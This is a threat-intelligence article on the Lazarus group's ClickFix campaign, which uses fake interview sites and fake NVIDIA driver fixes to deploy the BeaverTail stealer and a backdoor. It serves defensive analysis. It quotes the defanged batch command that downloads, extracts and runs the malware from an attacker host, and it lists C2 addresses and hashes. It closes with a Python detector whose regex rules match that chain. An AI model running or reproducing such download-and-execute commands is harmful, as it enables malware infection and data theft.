The notorious Lazarus APT group has evolved its attack methodology by incorporating the increasingly popular ClickFix social engineering technique to distribute malware and steal sensitive intelligence data from targeted organizations.
This North Korean-linked threat actor, internally tracked as APT-Q-1 by security researchers, has demonstrated remarkable adaptability by integrating deceptive user interface manipulation with their traditional espionage operations.
The ClickFix technique represents a sophisticated social engineering approach where attackers present victims with fabricated technical issues, then guide them through seemingly legitimate “fixes” that actually execute malicious code.
Lazarus has weaponized this method within their established fake recruitment campaign infrastructure, creating a multi-layered attack vector that combines job opportunity lures with technical deception.
CN-SEC analysts identified this campaign through the discovery of a malicious batch script that downloads disguised NVIDIA software packages, which subsequently deploy the group’s signature BeaverTail information stealer.
The attack chain begins when victims are lured to fraudulent interview websites that prompt them to prepare their interview environment, eventually claiming camera configuration issues require immediate resolution.
The technical sophistication of this operation extends beyond simple social engineering. Victims are presented with what appears to be a legitimate NVIDIA driver update command, but the command actually launches a malicious download-and-execute sequence.
The primary infection vector utilizes a PowerShell command that downloads and extracts a malicious ZIP archive from compromised infrastructure.
Recent analysis reveals that the group has expanded operations to target both Windows and macOS platforms, demonstrating cross-platform capabilities through tailored payloads for different operating system architectures.
The Windows variant focuses on enterprise environments through Node.js-based deployment mechanisms, while macOS versions utilize shell scripts designed for Apple Silicon and Intel processors.
Malware Deployment and Persistence Mechanisms
The core malware package, distributed as “nvidiaRelease[.]zip” (MD5: f9e18687a38e968811b93351e9fca089), contains multiple components designed for cross-platform compatibility and persistent access.
The initial ClickFix-1.bat script executes the following command sequence (defanged):

```
curl -k -o "%TEMP%\nvidiaRelease[.]zip" https[:]//driverservices[.]store/visiodrive/nvidiaRelease[.]zip && powershell -Command "Expand-Archive -Force -Path '%TEMP%\nvidiaRelease[.]zip' -DestinationPath '%TEMP%\nvidiaRelease'" && cscript "%TEMP%\nvidiaRelease\run[.]vbs"
```
The extracted archive deploys run[.]vbs, which performs system reconnaissance to determine the Windows build number.
For Windows 11 systems (build 22000 or higher), the script additionally executes drvUpdate[.]exe, a sophisticated backdoor capable of command execution and file manipulation.
This binary establishes communication with command-and-control servers at 103.231.75.101:8888, implementing functions including system information collection, remote command execution, and file transfer capabilities.
Core Malware Components:

| Component | MD5 Hash | Function |
|---|---|---|
| ClickFix-1[.]bat | a4e58b91531d199f268c5ea02c7bf456 | Initial payload downloader |
| nvidiaRelease[.]zip | f9e18687a38e968811b93351e9fca089 | Malicious archive package |
| run[.]vbs | 3ef7717c8bcb26396fc50ed92e812d13 | System reconnaissance script |
| main[.]js (BeaverTail) | b52e105bd040bda6639e958f7d9e3090 | Cross-platform information stealer |
| drvUpdate[.]exe | 6175efd148a89ca61b6835c77acc7a8d | Windows 11 backdoor |
The malware achieves persistence through registry modification, adding an entry to the Windows startup registry key that ensures execution across system reboots.
The BeaverTail component communicates with infrastructure at 45.159.248.110, demonstrating redundant command-and-control capabilities for maintaining long-term access to compromised systems.
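As an added defender-side example (not code from the CN-SEC report), the following Python scores process-creation command lines against the three stages of the ClickFix-1.bat chain above (insecure curl download into %TEMP%, Expand-Archive from %TEMP%, cscript running a .vbs from %TEMP%) plus the download host and C2 addresses named in this report. The host names, user paths and the benign look-alike events are constructed sample telemetry.

```python
import re

# Constructed sample process-creation events modelled on the ClickFix-1.bat
# chain (curl -> Expand-Archive -> cscript). Not real telemetry.
TEMP = "C:\\Users\\victim\\AppData\\Local\\Temp"
SAMPLE_EVENTS = [
    {"host": "WS01", "cmdline": f'curl -k -o "{TEMP}\\nvidiaRelease.zip" https://driverservices.store/visiodrive/nvidiaRelease.zip'},
    {"host": "WS01", "cmdline": f"powershell -Command \"Expand-Archive -Force -Path '{TEMP}\\nvidiaRelease.zip' -DestinationPath '{TEMP}\\nvidiaRelease'\""},
    {"host": "WS01", "cmdline": f'cscript "{TEMP}\\nvidiaRelease\\run.vbs"'},
    # Benign look-alikes on another host: archive extracted from Downloads,
    # admin script run from a normal scripts directory.
    {"host": "WS02", "cmdline": "powershell -Command \"Expand-Archive -Path 'C:\\Users\\bob\\Downloads\\report.zip' -DestinationPath 'C:\\Users\\bob\\Documents'\""},
    {"host": "WS02", "cmdline": 'cscript "C:\\Scripts\\inventory.vbs"'},
]

# One regex per chain stage; all are matched case-insensitively on the
# expanded command line (so %TEMP% appears as ...\Temp\...).
STAGE_RULES = {
    "curl_insecure_download_to_temp": re.compile(r"\bcurl\b(?=.*\s-k\b)(?=.*\s-o\s).*\\temp\\[^\s\"]*\.zip", re.I),
    "expand_archive_from_temp": re.compile(r"expand-archive\b.*-path\s+'?[^']*\\temp\\", re.I),
    "cscript_vbs_from_temp": re.compile(r"\bcscript\b.*\\temp\\.*\.vbs\b", re.I),
}
# Network indicators named in the report (download host and C2 addresses).
IOC_RULE = re.compile(r"driverservices\.store|103\.231\.75\.101|45\.159\.248\.110", re.I)


def match_event(cmdline):
    """Return the names of all rules that fire on one command line."""
    hits = [name for name, rx in STAGE_RULES.items() if rx.search(cmdline)]
    if IOC_RULE.search(cmdline):
        hits.append("known_network_ioc")
    return hits


def assess_hosts(events, min_stages=2):
    """Group hits per host. A host is flagged when at least `min_stages`
    distinct chain stages were observed, or any known network IOC appeared."""
    per_host = {}
    for ev in events:
        per_host.setdefault(ev["host"], set()).update(match_event(ev["cmdline"]))
    verdicts = {}
    for host, hits in per_host.items():
        stages = hits & set(STAGE_RULES)
        flagged = len(stages) >= min_stages or "known_network_ioc" in hits
        verdicts[host] = {"flagged": flagged, "hits": sorted(hits)}
    return verdicts


if __name__ == "__main__":
    for host, verdict in assess_hosts(SAMPLE_EVENTS).items():
        print(host, "FLAGGED" if verdict["flagged"] else "clean", verdict["hits"])
```

Requiring two of the three stages on the same host keeps a lone Expand-Archive or cscript invocation from paging anyone, while the IOC rule fires on its own because those values are specific to this campaign.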